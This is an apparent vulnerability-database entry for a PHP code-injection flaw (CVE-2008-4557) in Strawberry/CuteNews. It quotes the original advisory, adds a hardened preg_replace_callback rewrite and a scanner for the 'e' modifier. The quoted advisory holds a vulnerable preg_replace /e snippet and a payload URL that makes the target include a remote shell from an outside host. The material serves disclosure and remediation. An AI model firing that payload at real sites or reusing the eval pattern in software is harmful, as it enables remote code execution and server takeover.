CutePHP CuteNews code injection vulnerability

Vulnerability ID 1114231 Vulnerability type Code injection
Published 2008-01-06 Updated 2008-10-14
CVE ID CVE-2008-4557 CNNVD ID CNNVD-200810-241
Platform PHP CVSS score 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/4851
https://www.securityfocus.com/bid/84783
https://cxsecurity.com/issue/WLB-2008100157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-241
|Vulnerability details
plugins/wacko/highlight/html.php in Strawberry (from CuteNews.ru) contains a code injection vulnerability: a remote attacker can execute arbitrary PHP code via the text parameter, whose content is inserted into a regular-expression replacement that PHP evaluates as code.
|Exploit
----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]

							Strawberry (CuteNews) Remote Code Execution
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		Preg_replace with 'e' modifier allows code execution
		<?php

		$source = htmlspecialchars($text);

		// The 'e' modifier makes PHP eval() the replacement string after "$1" has been
		// substituted, so a comment body taken from the text parameter runs as PHP code.
		$source = preg_replace(
		'/<!--(.*?)-->/es',
		'"<span style=\"color: ".$options["color"]["comment"].";\"><!--".
		str_replace("<","<<!-- -->",
		str_replace("=","=<!-- -->",
		"$1")).
		"--></span>"',
		$source);

		?>
		
		strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]
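The replacement step quoted in the advisory hands its replacement string to eval() because of the 'e' modifier, so whatever the text parameter places between the comment delimiters is interpolated into a double-quoted PHP string and executed. The following is an added example, not code from CuteNews, Strawberry or the advisory: the same highlighting written with preg_replace_callback, which receives the matched comment body as a plain value, plus a small code-review helper that lists preg_replace() calls still carrying the 'e' modifier. It assumes $options['color']['comment'] holds a CSS colour as in the advisory's snippet and that scanned patterns use the '/' delimiter; the demo input and the scanned snippet are constructed for the example.

```php
<?php
// Added example, not code from CuteNews/Strawberry or the advisory above.
// Assumptions: $options['color']['comment'] holds a CSS colour, as in the
// advisory's snippet, and $text is the raw value of the text parameter.

// Hardened form of the comment-highlighting step: preg_replace_callback takes a
// closure, so the matched comment body is handed over as data and is never
// evaluated as PHP. (The 'e' modifier was deprecated in PHP 5.5 and removed in
// PHP 7.0, where preg_replace() rejects it with a warning.)
function highlight_html_comments_safe(string $text, array $options): string
{
    // Escape the whole input first, as the original does. From here on a
    // literal "<!--" appears as "&lt;!--", so the pattern matches that form.
    $source = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');

    return preg_replace_callback(
        '/&lt;!--(.*?)--&gt;/s',
        function (array $m) use ($options): string {
            // Same transformations as the original replacement, applied to a
            // string value instead of inside an eval()'d expression.
            $body = str_replace('=', '=<!-- -->', $m[1]);
            $body = str_replace('&lt;', '&lt;<!-- -->', $body);
            return '<span style="color: ' . $options['color']['comment'] . ';"><!--'
                . $body . '--></span>';
        },
        $source
    );
}

// Code-review helper: list preg_replace() calls whose first argument is a
// pattern literal delimited by '/' and carrying the 'e' modifier. Assumes the
// '/' delimiter; other delimiters would need a wider pattern.
function find_eval_modifier(string $php_source): array
{
    $calls = [];
    // Group 1: quote character, group 2: modifier letters after the closing '/'.
    $regex = '~preg_replace\s*\(\s*([\'"])/(?:[^/\\\\]|\\\\.)*/([a-zA-Z]*)\1~';
    if (preg_match_all($regex, $php_source, $matches, PREG_OFFSET_CAPTURE)) {
        foreach ($matches[2] as $i => [$modifiers]) {
            if (strpos($modifiers, 'e') !== false) {
                [$call, $offset] = $matches[0][$i];
                // Line number of the call, counted from the start of the source.
                $line = substr_count(substr($php_source, 0, $offset), "\n") + 1;
                $calls[] = ['line' => $line, 'call' => $call];
            }
        }
    }
    return $calls;
}

// Constructed demo input shaped like the advisory's payload: with the callback
// it comes back as escaped text inside the span instead of being executed.
$options = ['color' => ['comment' => '#808080']];
echo highlight_html_comments_safe('<!--{${phpinfo()}}-->', $options), PHP_EOL;

// Constructed snippet to scan: one call with the /es modifiers, one without.
$sample = <<<'PHP'
$a = preg_replace('/<!--(.*?)-->/es', '"$1"', $src);
$b = preg_replace('/\s+/', ' ', $src);
PHP;
print_r(find_eval_modifier($sample));
```

Run with the php command-line interpreter: the first line printed is the span containing the payload-shaped comment as inert text, and print_r lists only the first call of the scanned snippet (line 1). On PHP 7.0 and later the advisory's original pattern is rejected outright with "The /e modifier is no longer supported", but code bases still on PHP 5 should be scanned for it and moved to callbacks.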
|Affected products
CutePHP CuteNews 1.1.1
|References

Source: XF
Name: cutenews-html-code-execution(39450)
Link: http://xforce.iss.net/xforce/xfdb/39450
Source: OSVDB
Name: 40236
Link: http://www.osvdb.org/40236
Source: MILW0RM
Name: 4851
Link: http://www.milw0rm.com/exploits/4851
Source: SREASON
Name: 4403
Link: http://securityreason.com/securityalert/4403
Source: SECUNIA
Name: 28330
Link: http://secunia.com/advisories/28330